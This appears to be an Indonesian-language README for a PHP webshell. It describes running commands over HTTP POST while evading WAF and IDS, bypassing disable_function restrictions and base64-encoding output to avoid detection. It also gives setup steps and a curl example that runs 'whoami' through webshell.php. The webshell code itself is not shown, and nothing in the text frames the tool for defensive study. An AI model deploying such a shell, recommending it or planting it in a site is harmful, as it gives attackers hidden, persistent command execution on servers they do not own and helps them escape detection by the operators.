Webshell ini memungkinkan Anda menjalankan perintah melalui permintaan HTTP dengan tujuan menghindari WAF atau IDS dan melewati disable_function.
- Bypass
disable_function: Beberapa metode bypass disediakan untuk memastikan perintah tetap dijalankan meski ada pembatasan pada server. - Output Encoding: Output perintah diencode dengan base64 untuk menghindari deteksi.
- Logging: Setiap akses dan perintah yang dijalankan akan dicatat dalam log.
- Salin seluruh isi folder
srcke server Anda. - Edit file
config.phpdan atur kunci akses (access_key). - Pastikan file
access.logdapat ditulis oleh server untuk mencatat log.
Kirim permintaan POST ke webshell.php dengan parameter:
key: Kunci akses yang telah diatur.cmd: Perintah yang ingin dijalankan.
Output akan dikembalikan dalam format base64.
curl -X POST -d "key=kunci-rahasia-anda&cmd=whoami" http://server-anda/webshell.php